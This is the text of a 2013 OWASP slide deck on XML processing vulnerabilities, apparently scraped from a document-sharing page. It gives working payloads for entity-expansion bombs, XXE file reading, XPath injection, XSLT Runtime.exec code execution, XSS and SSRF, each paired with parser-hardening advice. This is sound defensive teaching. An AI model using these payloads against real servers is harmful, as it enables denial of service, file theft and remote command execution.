Embed Size (px)
DESCRIPTION
XML processing security vulnerabilities and how to avoid them.
Citation preview
OWASP
Pierre Ernst, 2013
XML Attack Surface
Business Analytics Security Competency Group
Pierre Ernst, 2013 322/
OWASP
XML is Pervasive
Pierre Ernst, 2013 323/
OWASP
XML intro■Born in 1998 (see initial specifications)■Data interchange format
– International languages support– Text based – Human readable
■Parsers– DOM– SAX, rooted in Ottawa (see bio)– StAX
■Complementary technologies and standards– XML Validation (DTD, XSD, ...)– XML Transformation (XSLT)– XML Query (XQuery, XPath)
Pierre Ernst, 2013 324/
OWASP
Is XML Secure?
■Nothing wrong with the standard itself■Most vulnerabilities due to
– Libraries/Tools misconfiguration– Insufficient validation of untrusted input
known, reported security vulnerabilities (see CVE search)
Pierre Ernst, 2013 325/
OWASP
XML Bomb
■CWE-776: Denial of service (memory exhaustion)■Amit Klein, 2002 (see BugTraq)■XML entity expansion
<!DOCTYPE ibm [ <!ENTITY ernst128 "pierre"> <!ENTITY ernst127 "&ernst128;&ernst128;"> ... <!ENTITY ernst002 "&ernst003;&ernst003;"> <!ENTITY ernst001 "&ernst002;&ernst002;"> <!ENTITY ernst000 "&ernst001;&ernst001;">]><ibm>&ernst000;</ibm>
Pierre Ernst, 2013 326/
OWASP
Modus Operandi
POST /request HTTP/1.1
1
2
<ibm>&ernst000;</ibm><ibm>&ernst001;&ernst001;</ibm><ibm>&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;</ibm>
<ibm>&ernst002;&ernst002;&ernst002;&ernst002;</ibm>
Attacker Vulnerable Server
Pierre Ernst, 2013 327/
OWASP
Demo #1: Server Crash with XML Bomb
(Source code available on demand)
Pierre Ernst, 2013 328/
OWASP
Variation: “Quadratic Blowup Attack”
■Amit Klein (see MSDN article)■Uses one single entity of size 50KB■Reference the entity 50,000 times■Useful to bypass
FEATURE_SECURE_PROCESSING protection– Limits entity expansions to
• 100,000 (IBM)• 64,000 (Oracle)
<!DOCTYPE pierre [ <!ENTITY e "eeeeeeeeeeee...eeeeeeeee">]><pierre>&e;&e;&e;...&e;&e;&e;</pierre>
Pierre Ernst, 2013 329/
OWASP
Protection
DOM SAX StAXfactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
Pierre Ernst, 2013 3210/
OWASP
External Entity Reference (XXE)
■CWE-611: Information Disclosure■Gregory Steuck, 2002 (see BugTraq)■Requires the server to include user-supplied data in
the response
<!DOCTYPE pierre [ <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini">]><pierre>&ernst;</pierre>
Pierre Ernst, 2013 3211/
OWASP
Modus Operandi
POST /request HTTP/1.1
1
2<pierre>[... content of the file on the server...]</pierre>
<pierre> &ernst;</pierre>
3
HTTP/1.1 200 OKContent-Type: text/xml
<response> Unknown service [... content of the file on the server...]</response>
Attacker Vulnerable Server
Pierre Ernst, 2013 3212/
OWASP
Demo #2: File Content Disclosure with XXE
(Source code available on demand)
Pierre Ernst, 2013 3213/
OWASP
Protection
DOM SAX StAXfactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
Pierre Ernst, 2013 3214/
OWASP
//users/user[name/text()= and password/text()= ]/name/text() //users/user[name/text()= and password/text()= ]/name/text()
'' or ''=''
'i8simon'
'pierre'
Blind Xpath Injection (“XML Injection”)
■CWE-643: Abuse of Functionality■Amit Klein, 2004 (see white-paper)■User input is embedded as-is in Xpath statement<users> <user> <name>pierre</name> <password>i8simon</password> </user> <user> <name>trevor</name> <password>mee2</password> </user> </users>
pierre
***********'' or ''=''
' or ''='
***********
Pierre Ernst, 2013 3215/
OWASP
Modus Operandi
POST /login HTTP/1.1
1
Attacker Vulnerable Server
//users/user[name/text()='' or ''='' and password/text()='' or ''='']/name/text()
2
pierretrevor 3
HTTP/1.1 200 OKContent-Type: text/html
Pierre Ernst, 2013 3216/
OWASP
Demo #3: Blind Xpath Injection
(Source code available on demand)
Pierre Ernst, 2013 3217/
OWASP
Variation: Read System Properties
■ JAXP implementation:–IBM–Oracle
■ Interesting properties:–os.version–user.name–java.class.path–sun.java.command
system-property('sun.java.command')
Pierre Ernst, 2013 3218/
OWASP
Protection
■ Input Validation.■ “[A-Za-z0-9_\-]+” in our example.
Pierre Ernst, 2013 3219/
OWASP
Code Injection during XSLT
■CWE-94: Improper Control of Generation of Code■When the attacker can control the XML style sheet
applied to an XML document.■Uses transformer engine extension capabilities
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="xalan://java.lang.Runtime" exclude-result-prefixes="rt"> <xsl:template match="/"> <xsl:variable name="obj" select="rt:getRuntime()"/>
<xsl:value-of select="rt:exec($obj,'calc.exe')"/> </xsl:template></xsl:stylesheet>
Pierre Ernst, 2013 3220/
OWASP
Modus Operandi
GET /request?doc=...&stylesheet=... HTTP/1.1
1
<doc>whatever</doc>
<stylesheet>malicious</stylesheet>
2
Attacker Vulnerable Server
Load class java.lang.Runtime
Call exec() method
3
Pierre Ernst, 2013 3221/
OWASP
Demo #4: Remote OS Command Injection
(Source code available on demand)
Pierre Ernst, 2013 3222/
OWASP
Variation #1: Universal XXE
<!DOCTYPE xsl:stylesheet [ <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini">]><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/"> &ernst; </xsl:template>
</xsl:stylesheet>
●“Universal”: you always see the entity in the response
Pierre Ernst, 2013 3223/
OWASP
Variation #2: Infinite Loop
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template name="loop"> <xsl:call-template name="loop"/> </xsl:template>
<xsl:template match="/"> <xsl:call-template name="loop"/> </xsl:template></xsl:stylesheet>
1
2
Pierre Ernst, 2013 3224/
OWASP
Variation #3: Cross-Site Scripting (XSS)
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:xhtml="http://www.w3.org/1999/xhtml">
<xsl:output method="html"/> <xsl:template match="/"> <xhtml:script>alert('XSS');</xhtml:script> </xsl:template>
</xsl:stylesheet>
Pierre Ernst, 2013 3225/
OWASP
Protection
■Several ways to abuse XML Stylesheet Transforms.■Users should never been able to use custom XML
stylesheets.
Pierre Ernst, 2013 3226/
OWASP
Server Side Request Forgery (SSRF)
■CWE-601: Open Redirect, but server-to-server■ {Nathan Hamiel, Shawn Moyer}, 2009 (ShmooCon)■XML vectors:
– Xml eXternal Entities (XXE)– Xinclude– External Doctype inclusion:
<!DOCTYPE PIERRE PUBLIC "ernst" "http://intranet:666/start-armageddon">
<pierre/>
Pierre Ernst, 2013 3227/
OWASP
POST /request HTTP/1.1Content-Type: application/xmlContent-Lenght: 666
<?xml version=”1.0”?>...
1
Attacker Vulnerable Server
Modus Operandi
Internal Service
2whatever
Pierre Ernst, 2013 3228/
OWASP
Protection
DOM SAX StAXfactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
Pierre Ernst, 2013 3229/
OWASP
Variation: Exotic Java URL Handlers
■ {Alexander Polyakov, Dmitry Chastukhin, Alexey Tyurin}, 2012 (CVE-2012-5085)
Pierre Ernst, 2013 3230/
OWASP
Conclusions
■Always configure your XML parsers to disallow Doctype.
–From a server's perspective, clients should not be able to define the grammar of the request anyway
–Secure Processing Flag is not enough–Preventing external entity expansion is not
enough
■XPath: validate user's input■XSLT: avoid at any cost■Always apply Java patches from vendors
Pierre Ernst, 2013 3231/
OWASP
■10 years as Software Developer
■5 years as Penetration Tester– 750+ vulns– Manual Code Review– Manual Black Box Testing– Java, XML, Open Source, …
https://twitter.com/e_rnst
http://ca.linkedin.com/in/pernst
Pierre Ernst
Pierre Ernst, 2013 3232/
OWASP
Questions & Answers
